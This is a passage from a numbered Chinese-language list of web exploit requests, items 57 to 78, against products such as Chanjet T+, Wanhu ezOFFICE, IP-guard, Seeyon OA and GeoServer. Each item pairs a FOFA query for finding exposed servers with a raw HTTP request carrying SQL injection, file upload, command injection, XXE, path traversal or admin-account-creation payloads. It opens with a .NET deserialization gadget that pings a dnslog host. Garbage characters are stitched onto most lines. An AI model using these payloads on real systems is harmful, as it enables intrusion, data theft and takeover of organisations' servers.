0 e9 @- B: ~9 ] "__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35",
, u- V0 a$ t1 e Y) R "MethodName":"Start",
8 Y+ y! {3 G$ v; f7 N3 Z) E "ObjectInstance":{; w& o o9 u& T- r& h& d
"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",
! T; L# M( G, [; v' ~1 j* E. O6 Z "StartInfo": {3 U: ]# L9 `* W+ E6 n
"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",1 k3 D' Z: H, ~! {3 e
"FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"
4 z1 m2 s3 y: f$ `1 Q }
. I4 W( n1 D! f, {5 M }
: [/ i& C1 c' R1 r }: e8 }+ D1 o1 C Y/ q
}
+ H5 ?* O* z0 k3 t% s! b- e$ p4 S6 a" @- B$ o! W
/ u0 Z; z* T! ^: D
57. 畅捷通T+ keyEdit.aspx SQL注入
, s* k& J& Q) O# sFOFA:app="畅捷通-TPlus"
8 n* F& I% A; a7 _' YGET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1% Q3 Q# e i$ Z& L1 p" g: a
Host: host
4 X+ b) y0 t- t! dUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
. x3 D4 a V$ J5 L! UAccept-Charset: utf-8
- j9 p; O2 i! ^7 n$ S* j! `: G. AAccept-Encoding: gzip, deflate m! z7 o8 n; [/ R& h
Connection: close! a3 J& y& l# d0 y. v2 ^' d
2 R$ ~! w4 i6 i4 L. I+ @
7 i2 b% E# j# H9 a, K9 R
58. 畅捷通T+ KeyInfoList.aspx sql注入' }9 n7 I [; A/ ?/ I
FOFA:app="畅捷通-TPlus"
( S7 Q o, |& y, M6 H8 JGET /tplus/UFAQD/KeyInfoList.aspx?preload=1&zt=')AND+1+IN+(SELECT+sys.fn_varbintohexstr(hashbytes('MD5','123456')))--+ HTTP/1.1
0 R- X# F9 J1 a' W# BHost: your-ip
7 N- ] K$ I( RUser-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36# o- i# j# `9 Q/ Q) M
Accept-Charset: utf-8
( t# }6 c) j! }; o* B6 n+ M EAccept-Encoding: gzip, deflate
9 f& |' K2 O; B6 _' ?) z' n3 G$ jConnection: close& q" N; S' S+ H# ?/ Y7 ` l7 p( W
9 ?- C( U- U9 g, [. y0 a$ J( @4 k: S. G. \' ?( M# v: S0 O2 A! j
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行: N* Z7 k/ _5 P& o* O& E" X. R
FOFA: title="@XETUX" && title="XPOS" && body="BackEnd"
5 ^6 x/ r4 D0 N0 b, r/ hPOST /xc-one-pos/javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1) ], C/ p5 S n; Y/ n
Host: 192.168.86.128:9090. h0 i, {! [! a8 a" N
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
, X- ? O4 b! {0 ?& BConnection: close
1 h- I9 T) z4 n# x( A& EContent-Length: 1669
f$ k. D* F# f! T$ ]8 ~1 e0 a7 GAccept: */*- z* q4 L/ k: i. r
Accept-Language: en2 p$ n7 y2 p0 n* m
Content-Type: application/x-www-form-urlencoded
- v+ g) `4 [8 L& [9 tAccept-Encoding: gzip; R: _5 @ U1 B" V
8 T0 w, t/ O2 i/ Z
PAYLOAD$ H' r6 U# O$ ] ]6 e
3 @; M6 Q6 _8 @/ a/ l0 y6 \/ p, \; I7 x! K" g" C
60. 百卓Smart管理平台 importexport.php SQL注入: K5 ?7 D: A' z9 |
FOFA:title="Smart管理平台"8 |4 H! a& ~0 ^* P) u
GET /importexport.php?sql=c2VsZWN0IDEsdXNlcigpLDM=&type=exportexcelbysql HTTP/1.1
/ q. V" P% z/ F$ `Host:& y& I5 N0 V. N7 ]% x5 X3 {0 Q
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36! |6 T4 x% f" T* I8 U( i7 D9 n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
+ ?- h3 }2 T" I& L9 a: U3 a7 H# vAccept-Encoding: gzip, deflate
4 B8 l2 m. X0 wAccept-Language: zh-CN,zh;q=0.9/ O6 W4 O6 q2 L3 ~
Connection: close
8 C+ u0 K. d# b, v. V/ y* _4 r/ t' y3 i2 o
2 g* Y8 p* H: m9 |8 J9 ^# [. w1 x' [6 Y3 S61. 浙大恩特客户资源管理系统 fileupload 任意文件上传
4 h& W) m6 B7 p* c9 a7 oFOFA: title="欢迎使用浙大恩特客户资源管理系统"3 E+ ~5 S0 i3 i
POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=8uxssX66eqrqtKObcVa0kid98xa.jsp HTTP/1.1
& r$ y% i, {$ KHost: x.x.x.x
$ H. t7 R+ L) D5 H0 q- i) xUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15- E, X( V4 _" [) u% y
Connection: close: a# x' L. m1 a. X: u
Content-Length: 27
8 G* E7 l2 S9 i: [. c9 SAccept: */*
% Y6 A7 }. |1 h/ G" f; \Accept-Encoding: gzip, deflate
2 V& I7 U5 z! d0 T2 I+ i* `2 \* fAccept-Language: en, ?& e( ^4 r# H7 V9 _+ Y/ i% J
Content-Type: application/x-www-form-urlencoded( }. Y9 d; Q6 n t9 C* ?0 f
1 c3 h$ p' J% y8 j# D) {% f! e8uxssX66eqrqtKObcVa0kid98xa
& H+ y% g& U. j2 n
+ L" ?8 }# W( }! V6 k3 f4 t) |6 M: }* Q
62. IP-guard WebServer 远程命令执行
" w1 h# ]; ^ [! J) AFOFA:"IP-guard" && icon_hash="2030860561"$ I% `7 A) o4 D) _& @- z0 F
GET /ipg/static/appr/lib/flexpaper/php/view.php?doc=11.jpg&format=swf&isSplit=true&page=||echo+"09kdujzKJDLinkQTLfGzMMKDJ23HJ"+>09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
( y$ S0 y8 d& |% j+ p4 z1 |3 fHost: x.x.x.x
1 \9 f4 J! h3 rUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.369 t6 B7 C' k- l6 u
Connection: close3 D* e& P7 L5 a! W3 e7 x2 n) D; z
Accept: */*( e0 |# W' S+ N5 L
Accept-Language: en
" Y8 S- O, t U5 R5 j# F1 K2 WAccept-Encoding: gzip
$ D7 B, N- m# O9 w+ {5 T/ o p0 F% K* p3 w! N
O6 b4 g- m) ?7 u% b' k
访问
" l% ^! Y9 \1 ~, o j
7 @6 G, |/ b+ D0 e, ~) P9 \GET /ipg/static/appr/lib/flexpaper/php/09kdujzKJDLinkQTLfGzMMKDJ23HJ.txt HTTP/1.1
2 X0 P J) n, h% g% A* I: D+ lHost: x.x.x.x# z( U& o- I5 g7 F; T% f* O8 [# ?1 m
+ L* x+ p/ h! a
& G5 U3 p' a* ^( q! B8 s/ h$ L% P g63. IP-guard WebServer任意文件读取& L" \' F* d% X" }: K" V# e
IP-guard < 4.82.0609.05 B( `7 }& S; G
FOFA:icon_hash="2030860561"
/ j* G$ u2 u: ]8 O# f" V9 U/ ^POST /ipg/appr/MApplyList/downloadFile_client/getdatarecord HTTP/1.1
& t i+ `3 W" j& P: R! r$ u- T/ g$ HHost: your-ip
' L9 F0 Y) W4 k' LUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36, ~% t9 z+ V, D6 f* M6 Z( D
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.71 j, F* b4 H/ Z' Y/ { V2 b, c
Accept-Encoding: gzip, deflate& c. Z) b. @! N* b# i
Accept-Language: zh-CN,zh;q=0.96 t* H$ D% N. _/ b1 t) i( @
Connection: close, p2 X; q* q* `5 E" n0 L# q+ m
Content-Type: application/x-www-form-urlencoded
' C+ L+ K$ ?) \7 ^, `/ Q9 d9 y- Z/ v [ r2 o7 ^9 j/ Q
path=..%2Fconfig.ini&filename=1&action=download&hidGuid=1v%0D%0A
$ u+ ^4 L9 X' |; h. r
* N* b! Z0 N- B+ U; J, G; A64. 捷诚管理信息系统CWSFinanceCommon SQL注入
0 {# }6 [: Z% S4 Z& VFOFA:body="/Scripts/EnjoyMsg.js"# ?/ V& L$ r6 e) z2 D9 e8 p
POST /EnjoyRMIS_WS/WS/APS/CWSFinanceCommon.asmx HTTP/1.15 }: p8 A5 ]( B S3 r6 m; X
Host: 192.168.86.128:9001; W9 p' C' ~+ w/ S
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 F4 | u3 t* u# F/ \5 e
Connection: close
& ]7 e" b7 v! ?1 }9 xContent-Length: 369+ K; G2 @. M" I/ r% [
Accept: */*8 O8 I6 Z1 ^+ `( C0 s+ W" [
Accept-Language: en& `1 V( l" T6 `/ K; n& p
Content-Type: text/xml; charset=utf-81 R# s* i2 W. P# b9 I2 V
Accept-Encoding: gzip
" l0 k3 ^, K1 ~3 V% T8 U7 b# P7 \
<?xml version="1.0" encoding="utf-8"?>& E; ~* l5 Q# X
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
5 w% F* n& R3 l; [<soap:Body>9 W Q% _6 k. L2 l
<GetOSpById xmlns="http://tempuri.org/">
d! E+ B+ E4 K <sId>1';waitfor delay '0:0:5'--+</sId>
+ ?$ ]! L% U' D" o& }6 h </GetOSpById>
2 j/ B* c$ a/ ]4 j. v; A; q& b5 T3 i </soap:Body>6 r0 ~' [; M3 D
</soap:Envelope>
. _$ j* F7 z! h2 p4 u5 I; k7 }( j% u1 o' X3 F! b6 \! Q
2 g8 R3 b/ l7 ?/ ]
65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过
; g8 b# Z5 ]6 ]9 N+ d: R4 lFOFA:title="欢迎使用脸爱云 一脸通智慧管理平台"2 F( o# z- l5 ?- q
响应200即成功创建账号test123456/123456" ]5 }, U- A$ w+ u+ a1 D
POST /SystemMng.ashx HTTP/1.14 r' c- E% h3 [- p" p- _
Host:
6 [7 Q5 q; y0 c9 B3 [. _3 N% rUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1). O2 `1 c: h5 G4 f. o
Accept-Encoding: gzip, deflate+ E2 U+ s+ o" {
Accept: */*% w' Q. J- ^1 p# B
Connection: close! F6 `4 V/ }* H
Accept-Language: en
% @; |7 P) n$ b u+ T( f! VContent-Length: 174
) ^6 s) Y& g: e4 W( Z0 m: W6 ^% ` q3 Y G$ V
operatorName=test123456&operatorPwd=123456&operpassword=123456&operatorRole=00&visible_jh=%E8%AF%B7%E9%80%89%E6%8B%A9&visible_dorm=%E8%AF%B7%E9%80%89%E6%8B%A9&funcName=addOperators
( U- j' e% K" A" ?2 n% o7 x- S& m5 H! Z1 U3 E4 f
9 [, m* C. M* ` P
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
. i! q2 z7 p7 ~9 l: d0 F' qFOFA:app="万户ezOFFICE协同管理平台"
) K8 O0 ~! w. H/ g1 Q% F" f+ J' x) p
GET /defaultroot/public/iWebOfficeSign/Template/SendFileCheckTemplateEdit.jsp?RecordID=1'%20UNION%20ALL%20SELECT%20sys.fn_sqlvarbasetostr(HashBytes(%27MD5%27,%27102103122%27))%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL-- HTTP/1.1
; Z2 F* {! m. M" X2 ~' VHost: x.x.x.x- f7 |! j8 A, v h! s( ?) h% |( D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
& h- f7 K) v! B7 `# _! q9 lConnection: close
* f% g; Q4 U: t, |9 ]1 JAccept: */*
! v$ {* F( B# i# f% y4 M; eAccept-Language: en
* Z: g+ i d) |) i! X- _Accept-Encoding: gzip# F+ W) e$ c0 q. Q* G
' _ {4 q3 u- u' p: ~
; A2 e: \3 u) l8 L* I( e: n第42,43行包含6cfe798ba8e5b85feb50164c59f4bec9字符串证明漏洞存在7 ?( M/ M7 _5 D0 m: N, N1 Q3 q
$ n) U4 S( y( ~ ?
67. 万户ezOFFICE wpsservlet任意文件上传
* f/ q7 j! B+ q5 a3 jFOFA:app="万户网络-ezOFFICE" i! M5 z7 l6 n: S& o
newdocId和filename参数表示写入文件名称,dir参数表示写入文件的路径,fileType参数表示文件类型' c5 b$ G" I) q# G. T2 j6 W
POST /defaultroot/wpsservlet?option=saveNewFile&newdocId=apoxkq&dir=../platform/portal/layout/&fileType=.jsp HTTP/1.1
$ k: R! R1 Q" C0 `! k$ pHost: x.x.x.x
* J5 a: T8 C& z; zUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
. L& j, n) }. DContent-Length: 173! l+ C' m& U5 V& ]. l
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
1 r a* E% P8 j& j, _' JAccept-Encoding: gzip, deflate
% m# R8 o) B/ u( HAccept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
% n$ P" f% @. G- s/ R" i& fConnection: close
# K2 k% m/ M+ {# a7 ]Content-Type: multipart/form-data; boundary=ufuadpxathqvxfqnuyuqaozvseiueerp
j$ A9 ^+ e6 |0 P6 n$ GDNT: 1
, F K2 R; j8 q: A# @5 a$ ^Upgrade-Insecure-Requests: 17 Q1 c; @3 {( ]. n/ y" c
3 w6 i( U* L& m8 ]( _' I! D* R- j--ufuadpxathqvxfqnuyuqaozvseiueerp
1 Q* [- \& J) H- fContent-Disposition: form-data; name="NewFile"; filename="apoxkq.jsp"7 |* l' A0 F5 m& a$ L+ G, l
7 \. O' u1 _7 m9 X<% out.print("sasdfghjkj");%>, |, Z, N+ V* P" ]
--ufuadpxathqvxfqnuyuqaozvseiueerp--% F1 O6 o3 L$ n: u
! S4 G( B* V* F
+ S( }# x2 D7 |3 A9 O- V- F4 z3 \9 i9 \
文件回显路径为/defaultroot/platform/portal/layout/apoxkq.jsp5 h/ j4 ?$ m% v! O B* v+ o) h
% N, p; H- @; c# h; P5 }
68. 万户ezOFFICE wf_printnum.jsp SQL注入
$ X J+ |" O* z4 W( t2 L( k- I( |8 WFOFA:app="万户ezOFFICE协同管理平台"
5 o8 O) C3 u9 Q# g3 W# o: }9 X/ ^GET /defaultroot/platform/bpm/work_flow/operate/wf_printnum.jsp;.js?recordId=1;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.11 k2 ]+ Y; H. f0 u3 ]# Y0 h( Z
Host: {{host}}
9 U2 J8 M, e7 J3 _1 h8 Z) @User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.84 Safari/537.36. B5 O" e) d0 k3 l& E
Accept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8
Y6 Q* e5 u* @* q- V$ ^: u) `, hAccept-Encoding: gzip, deflate6 ^3 `0 C. [! y( h$ D9 k
Accept-Language: zh-CN,zh;q=0.9) E& C {( R3 [, {+ A
Connection: close
% G3 I! H5 E) x0 Y: C2 r) p7 q& A1 t9 o
! G5 j/ _) |. _- p% N# u1 b* w6 I69. 万户 ezOFFICE contract_gd.jsp SQL注入
9 r( X* f( }- l' y6 SFOFA:app="万户ezOFFICE协同管理平台"
0 n+ y' v9 |( MGET /defaultroot/modules/subsidiary/contract/contract_gd.jsp;.js?gd=1&gd_startUserCode=1%27%3Bwaitfor%20delay%20%270%3A0%3A5%27-- HTTP/1.1
# h+ M* {( v+ l1 R! l! p; UHost: your-ip( D5 a: N$ [9 V) {- w: X0 }
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
7 R8 } S- J Y& m6 f# }* z$ } {$ nAccept-Encoding: gzip, deflate
6 F9 J1 Q1 X) A+ VAccept: */*9 P: E5 h( {& x3 e" J( p. E
Connection: keep-alive
8 u* ^% k/ s5 @, @9 Q
( _, S0 M5 r" P6 U
0 Z7 ?. r5 b+ C- ~70. 万户ezEIP success 命令执行# c2 B" A# b6 k: {
FOFA:app="万户网络-ezEIP"1 a" v& ?$ [+ N( c
POST /member/success.aspx HTTP/1.1
8 i) @ Q; X, n$ C/ ^, JHost: {{Hostname}}: N3 x- S0 }" a3 M- j/ q( j( T6 P+ L
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36, b' j6 Z; q) q8 o3 {
SID: dHlwZSBDOlxXaW5kb3dzXHdpbi5pbmk=
9 F* f2 R# X' O$ JContent-Type: application/x-www-form-urlencoded- q, B' m8 O( S# B1 D
TYPE: C
$ m5 i( p3 h& G6 P MContent-Length: 16702: i# ]6 u+ a( q& X* K
: o! Q& j! u/ R9 J1 }* _7 J__VIEWSTATE=PAYLOAD2 v7 a) D Q0 p# U
- K/ N% E/ C2 t6 n9 }1 h. W% a* m
7 u3 Y, L6 e, H5 y71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入
4 h$ O2 B: `& lFOFA:body="PM2项目管理系统BS版增强工具.zip"9 X, Y. m7 B) V, Q
GET /Global/Global_UserLogin.aspx?accId=1%27%3BWAITFOR+DELAY+%270%3A0%3A5%27--&loginCode&password&type HTTP/1.1
9 c% {: u+ H- X) U$ j7 S8 j+ pHost: x.x.x.xx.x.x.x
* g3 Y4 Q$ n3 U: ^ E- Z. Y+ ?User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
' f2 B9 c. K3 ~( l3 ^) }Connection: close
& Q* g. {: J6 d6 cAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% d l( N& F5 y' g) i
Accept-Encoding: gzip, deflate5 o t) w3 ^$ M. [! \( ?9 H" |/ i) I
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
0 X5 m/ g6 ]+ @ z' }Upgrade-Insecure-Requests: 1; s: p6 V9 r O+ m- h7 R. q9 t
9 X# ]! n' W1 X4 |$ ?5 t6 }+ y
# c# l! p& O; O) u9 @
72. 致远OA getAjaxDataServlet XXE: V- b' |" u! c6 J9 h* D5 ?) k' l, r
FOFA:app="致远互联-OA"- s4 X4 t9 Q0 i. B4 w$ M
POST /seeyon/m-signature/RunSignature/run/getAjaxDataServlet HTTP/1.1
) y! S9 B4 w( j& {2 h3 A( AHost: 192.168.40.131:8099
1 A& k" A3 x7 E- tUser-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36
1 {7 _7 Q) i. T6 ?5 I, j/ AConnection: close: R7 g+ u+ H! t
Content-Length: 5837 Z% _" { `% v
Content-Type: application/x-www-form-urlencoded
+ `5 ?/ F4 e, t: y0 o0 Q8 C0 d; I cAccept-Encoding: gzip6 I6 T/ ]6 P% d
. ]* G9 B% ^8 p( n3 |2 C T1 ]S=ajaxColManager&M=colDelLock&imgvalue=lr7V9+0XCEhZ5KUijesavRASMmpz%2FJcFgNqW4G2x63IPfOy%3DYudDQ1bnHT8BLtwokmb%2Fk&signwidth=4.0&signheight=4.0&xmlValue=%3C%3Fxml+version%3D%221.0%22%3F%3E%0D%0A%3C%21DOCTYPE+foo+%5B%0D%0A++%3C%21ELEMENT+foo+ANY+%3E%0D%0A++%3C%21ENTITY+xxe+SYSTEM+%22file%3A%2F%2F%2Fc%3A%2Fwindows%2Fwin.ini%22+%3E%0D%0A%55D%3E%0D%0A%3CSignature%3E%3CField%3E%3Ca+Index%3D%22ProtectItem%22%3Etrue%3C%2Fa%3E%3Cb+Index%3D%22Caption%22%3Ecaption%3C%2Fb%3E%3Cc+Index%3D%22ID%22%3Eid%3C%2Fc%3E%3Cdd+Index%3D%22VALUE%22%3E%26xxe%3B%3C%2Fd%3E%3C%2FField%3E%3C%2FSignature%3E& W+ y _/ ?) @4 R" O
0 ]2 @4 `. F& K- U" _1 W
6 _8 E4 o* ?' ^, p73. GeoServer wms远程代码执行
% r+ _7 Q, g: u( [- w/ U: l/ oFOFA:icon_hash=”97540678”
3 d: L1 e( U: m6 n3 \4 `! y1 `' uPOST /geoserver/wms HTTP/1.1
4 }" \. P3 A$ x4 a0 g+ |2 JHost:. x" B# b6 e7 U" n2 K
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.360 k) [+ f" @4 l" T: N }
Content-Length: 1981; v+ N+ C) }% ?( z2 P
Accept-Encoding: gzip, deflate
2 Z9 F# s7 H; A/ L( hConnection: close. k& Y; l: i3 h) T2 _" ~$ l
Content-Type: application/xml
1 K7 E" m* s( [6 C8 m- G" NSL-CE-SUID: 3% w; L- n' }/ ^7 V
. |* {7 L$ v/ n. C* J# r
PAYLOAD8 {, M" ?' |9 R2 G5 U5 ]5 q: |* x
( m5 z; q) Z2 b, u; _8 N1 z& e0 Q/ U: P- C
74. 致远M3-server 6_1sp1 反序列化RCE
% G& ^9 h+ L5 A) d3 I/ F+ C$ {$ x2 gFOFA:title="M3-Server"' O) y u5 z' M: E @* [6 b
PAYLOAD
9 @, D) M$ d6 s D+ f( `: F! W' F2 |
) Z, Z6 s1 L, s1 n3 d75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE, \+ z4 t1 O9 Q0 \) |
FOFA:app="TELESQUARE-TLR-2005KSH"8 q; G, a. k$ @/ s: A
GET /cgi-bin/admin.cgi?Command=setSyncTimeHost&time=`ifconfig>test28256.txt` HTTP/1.1
( |0 L& y+ _: C3 c$ p- @: }$ vHost: x.x.x.x
) D. A- _: U1 l: ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ S! p* u' p9 \9 R' ]7 ~Connection: close
+ c5 _0 o7 l. n" \0 pAccept: */*
* r2 f1 u+ ^( k5 pAccept-Language: en, g# ^) [) r8 y# n* E: ~5 l; |
Accept-Encoding: gzip! ?4 w7 P# ]6 [/ i
& r) L# R( G& j# F B) D
( c7 N& C W) P* o- Z, DGET /cgi-bin/test28256.txt HTTP/1.1$ ? F3 [1 O$ Y+ T& v
Host: x.x.x.x, T' X9 k% d( W5 J* `9 {/ J
1 K2 P- w) S/ P8 f2 Y# E
5 R* l7 y; `4 d; V76. 新开普掌上校园服务管理平台service.action远程命令执行
; X" }1 Y& w9 x3 B- zFOFA:title="掌上校园服务管理平台"6 }9 f( s K+ r$ w+ k" `7 c
POST /service_transport/service.action HTTP/1.19 C; z% ?! x6 S
Host: x.x.x.x4 {0 b8 Z; n( x' y( B+ Q5 r
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0
' {* c, _9 j* s2 C7 T! EConnection: close. J7 a2 n4 Q9 c' c' Q- `! `$ ?5 o
Content-Length: 211; S7 `# L8 p/ g
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
8 w9 B0 w4 K* T% sAccept-Encoding: gzip, deflate( P: U; V4 z7 E3 s# k% ?+ ^! s
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2- B, K4 \4 a' J8 W( X3 h: C2 n
Cookie: JSESSIONID=6A13B163B0FA9A5F8FE53D4153AC13A4
# s7 \) G1 J) mUpgrade-Insecure-Requests: 19 ?+ U v7 H+ U- _& F, K0 n
2 c; R$ K% m/ L- _8 r{
$ ~* M6 {: M, a6 p"command": "GetFZinfo",
: q! Y1 }9 ]( H: p" P/ N "UnitCode": "<#assign ex = \"freemarker.template.utility.Execute\"7 ]8 ^) y" y; }( U
?new()>${ex(\"cmd /c echo 9d8ajikdujw8ejd9wjdfkfu8 >./webapps/ROOT/9d8ajikdujw8ejd9wjdfkfu8.txt\")}"7 d3 {; ]* Y6 H2 N: M% x! l
}
- X) T7 ?* Z( d3 W$ `1 R. r6 m! U% C' q9 t- @, t
! l! X- i# u5 Q) S
GET /9d8ajikdujw8ejd9wjdfkfu8.txt HTTP/1.1' D: Z" F y3 _; E" r! q
Host: x.x.x.x1 a% |( j$ a; o
+ w6 F6 X6 r( t Q( q: e9 A+ j, l: D8 W# s8 r/ g/ z3 i
/ {" F% v4 Q) I% G
77. F22服装管理软件系统UploadHandler.ashx任意文件上传
& A% d- n% H/ U5 \- ~; jFOFA:body="F22WEB登陆"; P7 b4 r+ | M5 V9 x
POST /CuteSoft_Client/UploadHandler.ashx HTTP/1.1
' v1 K5 B- M2 |Host: x.x.x.x
( N9 Z4 A6 _. l: A3 oUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
7 p+ o& W, R. P, ~ a; xConnection: close
3 B( |* u. O& x, MContent-Length: 4336 o9 H1 a( b" ]7 ?: r2 O' m! w9 V
Accept: */*
9 ^: }0 x @) b" ]+ G. A7 f- ~9 SAccept-Encoding: gzip, deflate8 I7 ?9 N5 t* v& e3 H
Accept-Language: zh-CN,zh;q=0.9# ]% ]$ F+ W1 P! k
Content-Type: multipart/form-data; boundary=----------398jnjVTTlDVXHlE7yYnfwBoix: y2 T) O8 }, [
) N E- r3 r7 B* ?1 Q------------398jnjVTTlDVXHlE7yYnfwBoix
2 H% m0 \7 b' i( O- G. k0 HContent-Disposition: form-data; name="folder"" v& W. z0 }: F5 A& B' L' x
' p$ p6 [, v7 n: `
/upload/udplog
4 r$ H: ^& J6 y; a4 K5 a------------398jnjVTTlDVXHlE7yYnfwBoix
8 a( ^4 Y0 ~9 B* d6 R) \7 g( uContent-Disposition: form-data; name="Filedata"; filename="1.aspx"% K9 P+ A% y) y% }7 R; W
Content-Type: application/octet-stream8 o: }5 P7 J! s2 O
5 ~, ?. b: ?, E r0 g+ l" }hello1234567
$ [4 S1 {2 s8 j------------398jnjVTTlDVXHlE7yYnfwBoix
- g. \9 A, d/ V& V1 HContent-Disposition: form-data; name="Upload"
9 v9 F; V) I) r6 r! E3 k4 p! k- Q' \, p
Submit Query1 }% r. D) Z; e, }/ X
------------398jnjVTTlDVXHlE7yYnfwBoix--, _5 `. P% V7 Y& v
" c6 T2 V7 _! {" P! R$ E3 ^
8 U7 ?( o; B% W8 q! u& q78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
3 G$ y$ H0 g4 @9 dFOFA:icon_hash="2001627082"
1 v+ p+ `4 Z$ d; F! Z, n# a7 qPOST /Platform/System/FileUpload.ashx HTTP/1.1+ ] C/ _( l" B D, e9 k1 h$ b
Host: x.x.x.x A, W5 c; _; i( H* X3 O
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
7 `8 w" L% \( bConnection: close4 A, P+ s6 m# |8 i \- \+ w
Content-Length: 336
0 w" u) J- [0 T+ d1 FAccept-Encoding: gzip" U* x. H4 ^! H) C# P7 O
Content-Type: multipart/form-data; boundary=----YsOxWxSvj1KyZow1PTsh98fdu6l: z; B; H8 a: G+ j1 J
( D( N2 C% m. Q. X8 L0 s! a3 f------YsOxWxSvj1KyZow1PTsh98fdu6l
+ V( {, n; @% o! t- oContent-Disposition: form-data; name="file"; filename="YsOxWxSvj1KyZow1PTsh98fdu6l.txt"" t* T, h4 P1 b( N
Content-Type: image/png
( d. [6 P& t0 a9 v& q& ^) C2 O' R9 D: L2 |# m" {" N
YsOxWxSvj1KyZow1PTsh98fdu6l
9 @* Y6 i4 O& J# g, U; q------YsOxWxSvj1KyZow1PTsh98fdu6l
9 b/ {* h) _ r+ w5 IContent-Disposition: form-data; name="target"/ V w4 D: j V0 t7 z8 j
% F) q: z: W) f5 C% t( M7 k/Applications/SkillDevelopAndEHS/+ Q" K4 P( Y8 _( f
------YsOxWxSvj1KyZow1PTsh98fdu6l--
+ U. z1 A# E; B& K4 o
1 }5 F9 B" a6 W" G+ r( n+ D- n( M; h
GET /Applications/SkillDevelopAndEHS/YsOxWxSvj1KyZow1PTsh98fdu6l.txt HTTP/1.1
